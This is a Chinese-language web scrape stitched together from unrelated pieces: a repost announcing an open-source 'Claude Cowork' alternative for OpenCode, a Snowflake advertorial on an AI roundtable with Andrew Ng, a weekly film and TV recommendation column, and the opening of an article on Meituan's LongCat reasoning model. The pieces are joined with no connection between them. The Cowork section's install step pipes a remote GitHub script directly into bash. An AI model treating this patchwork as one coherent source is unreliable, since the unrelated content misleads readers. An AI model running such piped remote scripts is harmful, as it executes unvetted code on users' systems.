2026年1月

是什么?

开源版 Claude Cowor

Claude Cowor 目前只有 Max 用户才能使用

特性

  • 自主代理 - 像同事一样工作,而不只是聊天机器人
  • 任务规划 - 分析任务并制定执行计划
  • 进度更新 - 每一步都展示正在做什么
  • 安全可控 - 使用 OpenCode 内置的权限系统
  • 零依赖 - 只有一个 markdown 文件
  • 模型无关 - 使用你在 OpenCode 中配置的任何模型

前置要求

还没安装 OpenCode 的请移步:

安装

暂不支持 Windows,其他安装方式见官方文档
curl -fsSL https://raw.githubusercontent.com/Lucifer1H/open-cowork/main/install.sh | bash

使用示例

# 代码重构
/cowork 重构认证模块,提取验证逻辑

# 文件整理
/cowork 按功能重新组织 components 文件夹

# 生成文档
/cowork 分析代码库并生成完整的 API 文档

# Bug 调查
/cowork 找出登录间歇性失败的原因并修复

# 代码迁移
/cowork 将所有类组件转换为带 hooks 的函数式组件

PS: 本来昨天就发了,不知道是不是包含了小众软件链接,没有发出来,草稿里面也没了,今天重新发一下。


📌 转载信息
原作者: ageovb
转载时间: 2026/1/17 09:07:20

生成式 AI 的投资回报远超预期?Snowflake 调研全球 1900 位企业与 IT 专业人士后发现平均 ROI 高达 41%!点击下载完整报告

在技术发展史上,总会出现一些被反复回望的“拐点时刻”。在 Snowflake 首席执行官 Sridhar Ramaswamy 看来,我们正身处这样的关键节点之中——多年来机器学习与深度学习的研究积累、Transformer 等关键架构的突破,以及云计算规模能力的成熟,在这一刻汇聚,推动人工智能走向真正的产业化阶段。

在这一背景下,Snowflake 邀请了两位深度参与并塑造这一进程的核心人物,共同展开了一场关于 “未来十年 AI 蓝图” 的对话:堪称全球最具影响力的人工智能教育者和先驱者、LandingAI 执行董事长、DeepLearning.AI 创始人吴恩达(Andrew Ng),以及亚马逊云科技 Agentic AI 副总裁 Swami Sivasubramanian,他曾主导 Amazon SageMaker 与 Amazon Bedrock 的构建。

这场对话并未停留在对模型能力的抽象讨论,而是围绕竞争优势、商业模式、工程架构、数据治理以及开发者未来等关键问题,勾勒出一条从战略到落地的清晰脉络。

竞争焦点正逐渐脱离模型本身

围绕“AI 时代的护城河从何而来”这一核心问题,讨论首先打破了一个常见误区:竞争优势并不必然源于模型本身

在吴恩达看来,ChatGPT 这类产品在消费者层面形成的品牌认知,本身就构成了防御壁垒;但在更多行业场景中,护城河往往取决于行业结构,而非 AI 技术能力。例如,借助 AI 加速构建双边市场的平台,其持久性来自平台机制本身,而不是底层模型。

一个重要变化是,软件护城河正在被削弱。过去需要多年、大规模团队才能构建的软件系统,如今在 AI 辅助编程的加持下,其可复制性显著提高。API 调用的灵活性也使开发者能够迅速切换工具,这让“API 即护城河”的逻辑变得愈发脆弱。

Swami 从企业市场的视角补充道:在真实的企业环境中,竞争焦点正从“谁的模型更强”,转向“谁能通过 API 和服务,以更优的性价比,帮助企业真正提升收入或降低成本”。在这个意义上,真正的“最佳模型”,往往是企业自身的商业模式

从订阅制到按量计费:AI 正在重塑软件商业逻辑

在商业模式层面,圆桌讨论也触及了一个正在发生的结构性变化。

过去十余年,SaaS 以订阅制为核心,其背后依赖的是软件接近零边际成本的特性。但在 AI 尤其是智能体场景中,这一前提正在发生变化——推理成本真实存在,且可能随使用规模非线性增长

Swami 指出,当 AI 系统开始代表用户执行任务,且工作负载与用户数量脱钩时,更接近云服务的按量计费模式将变得合理且必要。吴恩达则从开发者体验出发,分享了一个直观感受:AI 编程工具的效率如此之高,以至于开发者愿意为其消耗更多算力和费用,因为由此带来的生产力提升是实实在在的。

这并非简单的定价方式变化,而是意味着 AI 正在重新定义“软件价值如何被衡量和付费”

成功的 AI 架构:产品先行,为不确定性留出空间

当讨论从战略转向工程实践,三位嘉宾形成了高度一致的共识:产品市场契合(PMF)始终优先于成本优化

吴恩达强调,在早期创新阶段,最大的挑战不是控制成本,而是打造用户真正热爱的产品。当 PMF 出现后,工程手段总能在后续阶段将成本曲线重新压低。关键在于,在架构设计之初,就为模型可替换性和技术选择权留出空间。

Swami 从大量初创企业的实践中总结出一条清晰路径:

  • 初期采用通用基础模型快速验证产品;

  • 随着真实负载显现,通过微调、蒸馏、提示缓存优化等手段应对非线性成本;

  • 将模型选型视为可演进的工程问题,而非一次性决策。

在这一过程中,掌控自身数据层被反复强调。将数据牢牢掌握在企业自身体系内,而不是被封装进供应商的“云端密匣”(box in a cloud),是确保未来技术与合作可选性的关键。

非结构化数据的真正解锁:从 PDF 开始

在谈及 AI 应用的下一个增长点时,吴恩达将注意力投向了一个长期被忽视的领域:非结构化数据

在他看来,企业中最具价值、却最未被充分利用的隐性数据,正大量存在于 PDF 文档之中。无论是金融领域复杂的报表,还是医疗行业的各类表单,过去人们对 PDF 的主要交互方式,往往只是简单的关键词搜索。

而如今,借助智能体驱动的文档解析能力,AI 已能够理解复杂表格结构、提取语义信息,并将其转化为可分析、可计算的数据资产。这一变化,正在迅速催生大量新的企业级应用场景。

给开发者的长期建议:回到基础,拥抱创造

在圆桌的最后,讨论回到了一个更具情绪张力的话题:年轻开发者在 AI 浪潮下的焦虑

Swami 指出,行业在某种程度上混淆了“编程”与“计算机科学”。即便 AI 能生成大量代码,对底层原理的理解,编译器、数据库、系统架构、数学与统计基础,依然不可替代。历史经验表明,每次技术变革初期都会经历短暂低谷与普遍焦虑,当前正处在类似阶段,但最终带来的是更大规模的创造者群体。

吴恩达则将这一判断推向更积极的方向:这是一个前所未有的创造窗口期。构建产品所需的时间和成本正在大幅降低,而 AI 辅助编程让“学习编程”本身变得更具现实意义和乐趣。

正如 Sridhar Ramaswamy 在圆桌结束时表示,未来无需被动等待,当下的我们比以往任何时候都更有能力去进项创造 。

原视频地址:https://www.snowflake.com/en/build/americas/agenda/?login=ML

点击链接立即报名注册:Ascent - Snowflake Platform Training - China

☕️ TL;DR

近期佳作推荐:[美剧] 匹兹堡医护前线 第二季、[动画] 中国奇谭 2、[动画] 咒术回战 死灭回游 前篇、[电影] 3670、[英剧] 投行风云 第四季、[美剧] 槲寄生谋杀案 第二季、[台剧] 人生只租不卖、[日剧] 京都人的私房雅趣 Rouge 继承、[动画] 命运/奇异赝品、[动画] 史前战纪 第三季

几则精彩预告:《葬送的芙莉莲 第二季》正式预告、《机动战士高达 闪光的哈萨维 喀耳刻的魔女》新预告、《海贼王 第二季》先导预告、《木乃伊》首支预告、《亢奋 第三季》首支预告

几则影视资讯:《呼啸山庄》确认引进、《闪灵》内地定档 1 月 30 日、《暗黑新娘!》内地定档 3 月 6 日、《庇护之地》内地定档 1 月 30 日


[美剧] 匹兹堡医护前线 第二季

  • 关键词:剧情 / 医疗
  • 又名:The Pitt Season 2
  • 片长:50 分钟左右(单集)× 15 集
  • 观看渠道:HBO豆瓣链接

生死一小时。

@潘誉晗:7 月 4 日,美国独立日。离上季结束已过去了十个月,但首季的音乐节事件,还是让罗比本就备受折磨的心理受到了影响。他决定完成今天的轮班后,就放个长假好好休息一下。不过急症室的状况,并没有因为罗比即将到来的休假变得轻松。新上任的医生是战地医院出身,行事雷厉风行,与罗比的风格完全不一样。而兰登医生也重回职场,只不过曾经的药物上瘾和偷药事件还是影响了他的信誉,因而被安排了分诊的工作。

在颁奖季上斩获诸多大奖的口碑剧集《匹兹堡医护前线》迎来了第二季,延续了首季一集为一天一小时的剧情安排,再现了急诊室高度紧张的节奏。这次的续作诚意满满,为我们带来了许多真实的案例,加上有着非常成熟的特效化妆技术,每一幕治疗的过程,都是极其写实的血肉镜头(不建议在饭点看)。写实的画面、超真实的压力感,感谢这些在走廊上永远奔跑着的医生们。


[动画] 中国奇谭 2

  • 关键词:短片集
  • 又名:Yao-Chinese Folktales 2
  • 片长:单集时长不固定 × 9 集,每周四更新
  • 观看渠道:哔哩哔哩豆瓣链接

我们村的龙就是没有角的。

@SHY:仍由上海美术电影制片厂联合出品,《中国奇谭 2》继续广招天下好汉,每集均由不同主创团队打造,将脑海中的想法转化为自由度极高的动画短片,题材和形式更加多元化。目前已上线的 4 集各有特色,质量均在水准线上。

第 1 集中冒名龙王的三只蛇妖,从偷吃香火到承担责任,用行动获得村民崇敬;第 2 集取材《聊斋》里「耳中人」的典故,被迷惑的书生落入层层嵌套的幻境,氛围塑造相当优秀;第 3 集的背景来到现代,笼中的动物们有着自己的心思,向往表演馆的小熊找到归宿;第 4 集则以精致的毛毡定格,探索母子的相处之道,学会适时放手也是爱。

主创们以奇幻色彩为表,现实议题为里,思索和探讨多重维度上的内涵,致力于讲好中国故事。吃下这几集的定心丸,有理由相信后面的集数也不会让我失望,延续第一季打下的坚实口碑。同时,我也由衷期待本季能诞生像《小妖怪的夏天》那样具有反哺作用的杰出单集,孕育出另一部兼具口碑和票房的动画电影,为中国动画产业添砖加瓦。


[动画] 咒术回战 死灭回游 前篇

  • 关键词:漫画改 / 奇幻 / 动作
  • 又名:呪術廻戦 死滅回游 前編 / Jujutsu Kaisen: The Culling Game Part 1
  • 片长:24 分钟(单集)× 具体集数未知,每周四更新
  • 观看渠道:巴哈姆特动画疯豆瓣链接

爱恨交织,紧紧相拥。

@SHY:「涩谷事变」后,虎杖悠仁的缓刑被取消,由特级咒术师乙骨忧太执行死刑。就在此时,羂索策划的死亡游戏「死灭回游」开启,伏黑惠的姐姐津美纪也被波及。进入结界的虎杖等人,在迎战强敌的同时,寻找解救他人的一线生机。

相较于但求无过的「鬼灭」动画,同为 20 年代少年漫改代表的「咒术」,给足了动画师自由施展的余地。在第二季迎来导演首秀的御所园翔太,于本季更上一层楼,为作品注入强烈的个人风格。尽管漫画在此篇章已经显露颓势,动画却充分吃透原著,进行适当的再构筑,在 MAPPA 的顶级作画助力下,将潦草的画面转换为酣畅淋漓的长篇打戏。

想法溢出的动画主创,从 OP 分镜就先声夺人,驰骋多种风格,彩蛋目不暇接,节奏与 King Gnu 完美合拍,让人想无限循环。正片以灵动的镜头调度和光影效果增添趣味,连第 3 集本该枯燥的大段解说,都通过海量演出巧思加以弥补,硬生生做出了几分 EVA 的感觉。这部改编层面上几乎无可挑剔的动画,可能是现在最具实验气质的商业动画大作。


[电影] 3670

  • 关键词:剧情 / 同性
  • 片长:124 分钟;豆瓣链接

我们两个,好孤独啊。

@潘誉晗:韩国同性恋社区中,有一个数字暗号「367」,指的是晚上 7 点,去首尔钟路 3 街的 6 号出口。这天,哲俊站在这里,他双手插着口袋,怀着期待地张望着,可惜身边车来人往,没有一个人为他停下。钟路 3 街 6 号出口,晚上 7 点,无人在场,也许这才是「3670」的真正含义。饱含寓意的开篇拉开了电影的序幕,也引出了影片的主人公哲俊,他是一名脱北者,也是一位同性恋。

近年来,有越来越多的文艺作品关注性少数群体,但像这部在 26 届全州国际电影节上以黑马之姿出现的影片,把脱北者与同性恋群体结合在一起的,还是首次。在影片中,我们透过俊哲,看到了一个非常孤独的个体:他在城市里掩盖着脱北者的身份,同时也隐藏着自己的性向——他在两个身份的夹层中,努力地寻找着灵魂的出路。电影拍得细腻又诗意,淡淡的悲情看似浅浅的,却不动声色地把那种藏在心里的疼痛给表达了出来。


[英剧] 投行风云 第四季

  • 关键词:剧情 / 金融
  • 又名:Industry Season 4
  • 片长:52 分钟左右(单集)× 8 集
  • 观看渠道:HBO豆瓣链接

Without an economic function, society buries you before you're dead . (没有经济能力,在你死之前,社会就会埋葬你。)

@潘誉晗:哈珀和雅思敏的事业进展得越发顺利了,她们在各自擅长的领域里闪闪发光,不过也有挑战等着她们。在资产管理公司就职的哈珀本以为是自己的能力被看到,可当上司说出真话,她才意识到是因为她的黑人肤色,能够给公司带来一张很不错的公众名片。豪门婚姻的外表光鲜亮丽,但深陷其中的雅思敏只觉空虚。另一边,一位叫吉姆的财经记者联系上哈珀,想对她进行采访。

阔别一年,《投行风云》第四季终于和观众见面。首播第一集就是满满的信息量,让观众看得忍不住感慨「就是这个熟悉的感觉!」本季的故事围绕着一家金融科技公司所展开,这家公司看似风头正盛,可其实是靠着擦边、色情支付发家的。巨大的利益充满了各种诱惑,哈珀和雅思敏也因此站在了相反的立场上。也许金融风暴圈的中心就是这样,金钱才是唯一的上帝,因而利益就是一切,所以爱情是能出卖的,友情也可以背叛。


[美剧] 槲寄生谋杀案 第二季

  • 关键词:剧情 / 悬疑 / 惊悚
  • 又名:Mistletoe Murders Season 2
  • 片长:42 分钟左右(单集)× 6 集;豆瓣链接

又到圣诞节了,似乎是该发生点命案了。

@潘誉晗:十一个月前,由于不愿透露自己的秘密,艾米丽与山姆不欢而散,两人甚至因此断绝了联系,不过山姆的女儿维奥莱特一直与艾米丽保持着往来,她表示想重新回艾米丽的店里工作,也向艾米丽分享着自己的生活。这段时间,因英语老师兼国际象棋社顾问亨利的拜托,她一直帮一位男生补习英语。直到这天,亨利失踪了。副校长说亨利匆匆辞职,可艾米丽觉得,事情并没有这么简单。

依然是两集一案节奏的剧集,这一季还根据艾米丽在每个案件的侦查过程中,融入了她的过往经历。这样的双线叙事不仅让观众对艾米丽有了更进一步的了解,也更好地塑造了这一人物形象。艾米丽确实在破案,却也用这种抓住真凶的方式进行着心理创伤上的自救。就像是从槲寄生叶的缝隙里透出的阳光一样,也许只是些许的光亮,但却足够给艾米丽带去力量。除案件外,艾米丽与山姆的暧昧情愫也依然好嗑。


[美剧] 菜鸟老警 第八季

  • 关键词:剧情 / 喜剧
  • 又名:The Rookie Season 8
  • 片长:43 分钟左右(单集)× 18 集;豆瓣链接

老又怎么了?经验丰富啊。

@潘誉晗:系列第八季,预算升级,开播第一集就把舞台搬到了布拉格。为了抓捕一名危险的军火商,警方和老熟人莫妮卡达成协议,由诺兰伪装成保镖,妻子贝利伪装成助手,一起在异国进行卧底任务,顺便也二度了一次蜜月。洛杉矶的各位也很给力,在格雷中尉的指导下直捣军火商的据点。同时,露西和蒂姆也和好如初,开启了甜蜜的同居生活。

长寿刑侦喜剧《菜鸟老警》第八季的故事剧情,依然稳定得让人心安。这部聚焦于「40+ 中年男性再出发」的剧集,着实把一位中年选择重新开始人生的人物形象,塑造得很圆满。诺兰确实不年轻了,双鬓有白发,体力也肯定不如年轻探员,但是他依然有那份愿意拼搏的冲劲。谁说超过 40 岁就要停下,谁说不再年轻就不能上前线?诺兰用身体力行告诉观众不退场的意义,也用八季的时间,从菜鸟老刑警一步步成长为值得信任的刑警,给观众带来「不要轻易放弃」的力量。


[台剧] 人生只租不卖

  • 关键词:剧情 / 喜剧
  • 片长:45 分钟左右(单集)× 12 集;豆瓣链接

是有理想、有能力,还是烂工作、烂老板?

@利兹与青鸟:何幸琪从小父母离婚,十七八岁时父亲去世房子被过户给阿姨,无比倒霉地开始租房生活。突然有一天接到律师电话,原来去世的母亲留下一套好地段的房产,但要和一位先生共同继承。这位程轩先生是星河房管事务所所长,承诺何幸琪来事务所上班满一年,就把另一半房屋所有权给她,但前提是业绩要达标。于是靠打零工维生的何幸琪就这样离奇地天降工作和房子,成为这家主营租房中介、包租代管公司的业务员,开始了和客户斗智斗勇的人生新体验。

这部闽南语台剧以轻喜剧的风格,铺开台北的租房生态,既涉及社会不同阶层与弱势群体,也讲解各式租赁类型与新兴政策,比如由政府补贴、以市价八折出租的社会住宅。多巴胺穿搭的女主让人眼前一亮,俏皮、机灵但也是个愣头青,随着对接客户增加,冲突矛盾也一件接着一件;声音甜甜很可爱,但也嘴上不饶人,经常代替观众吐槽,颇有生趣。剧中每集结尾都会留下悬念,观众轻易便能代入女主视角,在质疑中探索行业折射出的人生百态。


[日剧] 京都人的私房雅趣 Rouge 继承

  • 关键词:剧情
  • 又名:京都人の密かな愉しみ Rouge 継承
  • 片长:45 分钟左右(单集)× 9 集;豆瓣链接

京都之美。

@利兹与青鸟:京都出生、巴黎长大的洛在父亲的提议下,来到京都留学,并尝试继承一间和菓子店,这是一家有着两百多年历史、传承了八代人的老字号——久乐屋春信,甚至已经成为京都文化的一部分,却面临无人继承的局面。不管是一时冲动,还是身为京都人的 DNA 动了,成年后首次踏上故土的洛游览起京都的名胜,在莲华王院参拜千手千眼观音、在蛮夷川渡石间跳跃、在二条大桥上眺望鸭川,感受这座古都与自己连接。

「京都人的私房雅趣」系列自 2015 年起已播出 7 部,均由源孝志担任导演与编剧,风格也自成一派,时不时穿插着京都的人文历史,如纪录片般古典淡雅,又像旅行观光片一样优美精致,带着京都人的毒舌冷幽默,娓娓道来这个京都家族的故事。首集便以十一面观音借喻京都人不会轻易展露内心的特质,介绍故事背景和有些复杂的人物关系,即便没看过前作也能轻松代入。轻缓柔和的钢琴配乐,也让人心情平静下来想要继续看下去,在不同文化与代际的交织对撞下,洛将会如何传承这间百年老店。


[动画] 命运/奇异赝品

  • 关键词:小说改 / 奇幻 / 动作
  • 又名:Fate/strange Fake
  • 片长:24 分钟(单集)× 13 集,每周六更新
  • 观看渠道:巴哈姆特动画疯豆瓣链接

艺术就是瓦斯爆炸!

@SHY:第五次圣杯战争数年后,美国西部的雪原市出现异变,御主和从者集结于虚伪的台座,按各自的想法行动。然而,当本不该存在的 Saber 职阶被召唤,「虚伪的圣杯战争」升格为真实,魔术师和英灵们的盛宴拉开帷幕。

试问,Fate 系列的核心卖点为何?不明觉厉的时髦设定和关公战秦琼的英灵战斗一定名列前茅。而这两项,正是作者成田良悟的拿手好戏。专注群像剧的他,笔下没有绝对意义上的主角,起手就是数十位角色,来头一个比一个炸裂。操弄轻车熟路的多视角切换,安排人人有份的高光时刻,神仙打架的究极大乱斗,满足中二少年对圣杯战争的一切幻想。

A-1 Pictures 制作的改编动画找准定位,在维持主干的基础上,大幅压缩了原著文戏,保证每集均有重量级打戏。从序章《黎明低语》的「闪恩对轰」开始,爆点此起彼伏,贡献名场面无数,毫不吝啬的作画资源加上泽野弘之的恢弘配乐,怎一个爽字了得。这场兼顾正剧和闹剧的幻想嘉年华,堪称本季度最强爆米花动画,有潜力成为年轻人的第一部 Fate。


[动画] 史前战纪 第三季

  • 关键词:奇幻 / 动作 / 冒险
  • 又名:Primal Season 3
  • 片长:22 分钟(单集)× 10 集,每周日更新
  • 观看渠道:HBO Max豆瓣链接

死亡不是终点。

@SHY:世代交替的第二季结局后,大部分观众想必认为,片尾骑龙出征的矛的女儿将接过主角宝座。然而,本作向来不按套路出牌。第三季开头,本已长眠的矛被复活为行尸,而在意外摆脱控制后,只剩躯壳的他靠本能游荡,直到残存的记忆泛起涟漪。

据主创格恩迪·塔塔科夫斯基透露,他本打算将第二季作为系列句点,直到突然冒出了这个难以割舍的点子。继承令前作脱颖而出的要素,本季用凌厉的笔锋勾勒众生百态,深入这片弱肉强食的原始地域。变成僵尸的主角,在能承受更多伤害的同时,下手也更加没轻没重,以血肉横飞的殊死搏斗,践行令人血脉偾张的暴力美学。

失去理性和情感的主角,断绝了与往日的联系,却在某种意义上令本季更贴近本源,回归故事伊始时神秘而克制的蛮荒冒险。当朦胧的片段逐渐明晰,矛追随着一度留下的痕迹,踏上探寻自我、找回人性的漫漫长路,从另一种角度重新认知这个世界。结合优秀的美术和鲜明的叙事,相信这部有口皆碑的硬派成人动画,定能续写辉煌。


更多

[电影] 用武之地 @潘誉晗:电影改编自真实事件,驻外记者马笑与医生潘文佳陪同工程师苗峰修理基站,却被恐怖分子绑架,在面对 500 万美金一人的赎金条件,展开了为期 105 天的自救行动。得益于对事件和相关资料的大量考察,电影拍得细腻而真实。沙尘、爆炸、鲜血、恐怖分子的暴虐惨无人道……战争永远残忍,我们要远离战争、热爱和平。

[美剧] 他和她的谎 @Sholmes:亚特兰大附近的小镇上发生了一起凶杀案,负责调查案件的杰克和报道这件案子的主播安娜都认识死者瑞秋。在瑞秋被害的当晚,杰克和她在树林中的车里约会,而安娜就在不远处冷眼旁观,杰克和安娜只能通过谎言来掩盖和被害人的联系。本剧以双视角叙事探讨真相与谎言的界限,构筑了一个关于欺骗和自我保护的多层次叙事迷宫。

[日剧] 东京 P.D. 警视厅公关二课 @Sholmes:今泉是一名刑警,却意外被调往警视厅广报课,负责与媒体打交道,让他深感困惑与抗拒。墨田区发生一起女性刺杀案,调查结果指向长期跟踪受害者的警察矢岛,但为了掩盖丑闻,警视厅人事监察课长桥本强行将无辜的流浪汉塑造成凶手,今泉试图用迂回的手段揭开真相。该剧以刑事案件和媒体报道为切入点,兼具社会性与悬疑张力。

[日剧] 天狼星的反证 @Sholmes:藤嶋律师致力于为蒙冤者辩护和翻案,25年前发生的「吉田川事件」中被判死刑的宫原,如今向藤嶋寄来了声称自己无罪的信件。藤嶋开始调查这桩陈年旧案,挑战几乎不可能成功的再审请求。剧中不仅聚焦案件真相的抽丝剥茧,更通过律师自身的创伤、死刑犯家属的苦痛等群像刻画,让这个关于司法正义的故事充满了人性关怀。

[韩剧] UDT :我们小区特工队 @潘誉晗:这个小区不得了,保险调查员崔江是 UDT 出身的爆破专家,五金店老板郭炳南是前特种兵,而超市女老板更是叱咤风云的魔鬼教练。退役后的他们只想过平凡日子,可小区内接连发生的爆炸案,让三人决定联起手来,保护所在的小区。完美融合了动作与喜剧元素的剧集节奏很好,守护家人与家园这个主题也很温馨动人。

[爱尔兰] 莱昂纳德和饥饿的保罗 @潘誉晗:莱昂纳德和保罗是对安静的好友,莱昂纳德有种平静的丧感,平时没啥特别的喜好,唯一的乐趣就是去保罗家玩桌游。保罗和父母同住,生活也是淡淡的。根据同名小说改编的剧集讲述了两个大龄青年的生活,莱昂纳德和保罗的日常,没有太多的起伏与波澜。可正是这样克制安静的简单日子,会让你觉得生活也许就该这样。


📅 本周新预告

《葬送的芙莉莲 第二季》正式预告

1 月 11 日,TV 动画《葬送的芙莉莲 第二季》发布了正式预告,宣布 OP 由 Mrs. GREEN APPLE 演唱,将于 1 月 16 日开始播出。本作改编自山田钟人、阿部司的同名漫画,斋藤圭一郎导演协力,北川朋哉执导,MADHOUSE 制作,讲述精灵魔法使芙莉莲的旅程。 来源

《机动战士高达 闪光的哈萨维 喀耳刻的魔女》新预告

1 月 16 日,动画电影《机动战士高达 闪光的哈萨维 喀耳刻的魔女》发布了主题曲预告,将于 1 月 30 日在日本上映。本作改编自富野由悠季的同名小说,村濑修功执导,武藤康之编剧,泽野弘之配乐,日升制作,小野贤章、上田丽奈、诹访部顺一、齐藤壮马等配音。 来源

《海贼王 第二季》先导预告

1 月 12 日,《海贼王》真人美剧第二季发布了「巴洛克华克」版预告,将于 3 月 10 日上线 Netflix。伊纳基·戈多伊、新田真剑佑、埃米莉·拉德、雅各布·吉布森、塔兹·斯盖拉等主演,草帽一伙从罗格镇起航,穿越颠倒山抵达伟大航道,斯摩格、罗宾、薇薇、乔巴等亮相。 来源

《木乃伊》首支预告

1 月 13 日,电影《木乃伊》发布了首支先导预告,将于 4 月 17 日在北美上映。温子仁监制,李·克罗宁(《鬼玩人崛起》)执导,杰克·莱诺、莱娅·科斯塔、梅·卡拉美维等主演,一位记者的女儿在沙漠神秘失踪,本应是重逢的喜悦,却逐渐演变成一场活生生的噩梦。 来源

《亢奋 第三季》首支预告

1 月 14 日,HBO 热门剧集《亢奋》发布了第三季首支预告,定档 4 月 12 日开始播出。赞达亚、亨特·莎弗、埃里克·迪恩、雅各布·艾洛蒂、西德尼·斯维尼、科尔曼·多明戈、罗莎莉亚、亚历克萨·德米、茉德·阿帕图等回归出演,高中生活结束,众人走向了不同的人生。 来源

更多

电影《复仇者联盟 5:毁灭日》新贴片预告:宣布神奇四侠和瓦坎达人回归,此前 3 支贴片预告已陆续确认美国队长、X 战警、雷神等超英回归,小罗伯特·唐尼回归饰演大反派毁灭博士,罗素兄弟执导,已定档 12 月 18 日在北美上映。 来源

剧集《帝王计划:怪兽遗产 第二季》先导预告:库尔特·拉塞尔、泽井杏奈、科雷西·克莱门斯、渡部莲、平岳大等继续主演,哥斯拉和泰坦巨兽们的激战将旧金山夷为平地,来到怪兽真实存在的惊人新世界,2 月 27 日上线 Apple TV。 来源

《洛杉矶劫案》发布新正式预告:克里斯·海姆斯沃斯、哈莉·贝瑞、马克·鲁法洛、巴里·基奥恩主演,巴特·雷顿(《美国动物》)执导并联合彼特·斯特劳恩(《锅匠,裁缝,士兵,间谍》)编剧,改编自唐·温斯洛所著同名小说,2 月 13 日北美上映。

📽 影视新闻周报

《呼啸山庄》确认引进

1 月 12 日,电影《呼啸山庄》确认引进中国内地,并发布了 预告 和海报,档期待定。埃默拉尔德·芬内尔(《萨特本》)执导,玛格特·罗比、雅各布·艾洛蒂主演,周洪、艾莉森·奥利弗、欧文·库珀等出演,演绎孤儿希斯克利夫和恩萧家女儿凯瑟琳那悲伤且激烈的爱情。 来源

《闪灵》内地定档 1 月 30 日

1 月 14 日,电影大师库布里克传奇之作《闪灵》发布了 中国内地定档预告 和海报,将于 1 月 30 日以 2D、CINITY、IMAX 制式首登内地影院。杰克·尼科尔森、谢莉·杜瓦尔、丹尼·劳埃德主演,作家杰克和妻子温蒂、儿子丹尼搬进雪山酒店,诡异事件如影随形。 来源

《暗黑新娘!》内地定档 3 月 6 日

1 月 16 日,电影《暗黑新娘!》发布了 中国内地定档预告 和海报,将于 3 月 6 日同步北美上映。玛吉·吉伦哈尔执导,杰西·巴克利、克里斯蒂安·贝尔主演,孤独的科学怪人弗兰肯斯坦恳请尤弗洛尼斯博士为他创造一位伴侣,两人成功复活了一名被谋杀的年轻女子。 来源

《庇护之地》内地定档 1 月 30 日

1 月 15 日,动作惊悚电影《庇护之地》发布了 中国内地定档预告 和海报,将于 1 月 30 日同步北美上映。里克·罗曼·沃夫执导,杰森·斯坦森主演,隐居孤岛的黄金特工梅森本想与世隔绝,因意外救下少女杰茜被迫重操旧业,展开了一场没有退路的守护之战。 来源

🎪 彩蛋

本期彩蛋是由中奖读者 @科技爱好者 提供的「看图猜电影」,首位猜中片名的读者,可获得彩蛋提供名额 1 次(彩蛋内容包括但不限于「猜电影」「你喜欢的经典影视作品/影人/台词」「电影冷知识」),和我们不定期发放的奖品。本期猜中的「第一名」将会在这篇文章中更新,届时也请各位参与互动的朋友注意站内私信~

> 小红书 📕 关注 少数派sspai本周看什么,找到数字时代更好的生活方式 🎊

> 看什么 Café / 主题片单专题页、2021 年度回顾,更多影视推荐尽在 #本周看什么🎬

    美团又上新模型,8个Thinker齐开工,能顶个诸葛亮?

    0%
    icon展开列表
    面向临床的心电图AI,上智院、复旦等提出CLEAR-HUG框架实现诊断性能与可解释性双突破
    今天
    img
    神同步OpenAI!中国团队Deep Principle领衔发布LLMs for Science评测,引爆外网
    今天
    img
    美团又上新模型,8个Thinker齐开工,能顶个诸葛亮?
    今天
    img
    失去三个联创后,Mira公司危机持续:又有两人要出走
    今天
    img
    不止于量化:最新综述用「时-空-构」三维视角解构KV Cache系统级优化
    今天
    img
    支付宝携手千问App、淘宝闪购等发布中国首个AI商业协议ACT
    今天
    img
    刚刚,Geoffrey Hinton成为第二位引用量破百万的科学家
    今天
    img
    腾讯AngelSlim升级,首个集LLM、VLM及语音多模态为一体的投机采样训练框架,推理速度飙升1.8倍
    今天
    img
    DeepSeek连发两篇论文背后,原来藏着一场学术接力
    今天
    img
    仅需一个混频器的无线射频机器学习推理,登上Science Advances!
    今天
    img
    国内首个可复现!萝博派对公开人形机器人 “从 0 到跑” 全开源方案
    01月15日
    img
    联发科天玑9500s、8500发布:GPU、光追拉满,红米Turbo 5Max将搭载
    01月15日
    img
    通用级PixVerse P1的技术突破,揣着进入平行世界的密码
    01月15日
    img
    Mira公司内乱?CTO被开除,带团队回OpenAI,翁荔上推发言
    01月15日
    img
    Nature丨清华等团队揭示AI科研双重效应:个人效率亦或是科学边界
    01月15日
    img
    刚刚,喝到了千问APP给我点的奶茶
    01月15日
    img
    人脸机器人登上Science Robotics封面:用AI教会仿生人脸机器人「开口说话」
    01月15日
    img
    实测夸克「千问划词快捷指令」,这7个邪修Prompt,建议收藏
    01月15日
    img
    已证实!清华姚班陈立杰全职加入OpenAI,保留伯克利教职
    01月15日
    img
    解锁任意步数文生图,港大&Adobe全新Self-E框架学会自我评估
    01月15日
    img

    美团又上新模型,8个Thinker齐开工,能顶个诸葛亮?

    编辑|Panda、杨文

    临近春节,各家 AI 厂商进入冲刺阶段,纷纷亮出最新大模型成果。

    1 月 15 日,美团也重磅更新自家模型 ——LongCat-Flash-Thinking-2601

    这是一款强大高效的大规模推理模型,拥有 5600 亿个参数,基于创新的 MoE 架构构建。

    图片

    该模型引入了强大的重思考模式(Heavy Thinking Mode),能够同时启动 8 路思考并最终总结出一个更全面、更可靠的结论。目前重思考模式已在 LongCat AI 平台正式上线,人人均可体验。

    图片

          仅选择「深度思考」时才会触发重思考模式。

    • 体验链接:https://longcat.ai

    • 模型地址:https://huggingface.co/meituan-longcat/LongCat-Flash-Thinking-2601

    • GitHub:https://github.com/meituan-longcat/LongCat-Flash-Thinking-2601

    不仅如此,该模型的智能体能力还获得了重大提升:在智能体工具调用、智能体搜索和工具集成推理等基准测试中达到顶尖性能,而且在任意的 OOD(分布外)真实智能体场景中实现了泛化能力的显著提升。

    图片

    研究团队还专门提出了一种全新的智能体模型泛化能力评测方法。

    通过构建自动化的环境和任务合成流程,基于给定关键词,随机生成任意的复杂任务。每个生成的任务都配备对应的工具集与可执行环境。

    这种高度随机化的评测方式,能够更真实地检验模型在未知场景下的适应能力。

    实验结果表明,LongCat-Flash-Thinking-2601 在该评测中始终保持领先性能。

    接下来,我们就把模型拉到真实场景里实测一番。

    一手实测:这只龙猫有点强

    我们先来试试数理逻辑推理,顺便看看这个重思考模式到底是怎么一回事。

    「运动会招募志愿者,第一次招募了不到 100 人,其中男女比例为 11:7;补招若干女性志愿者后,男女比例为 4:3。问最多可能补招了多少名女性志愿者?」

    在 longcat.ai 上开启「深度思考」后,便进入了重思考模式,此时 8 个 Thinker 同时开工,每个都表现出不同的思考风格。有的按常规解题,有的则直接写了个 Python 脚本。

    图片

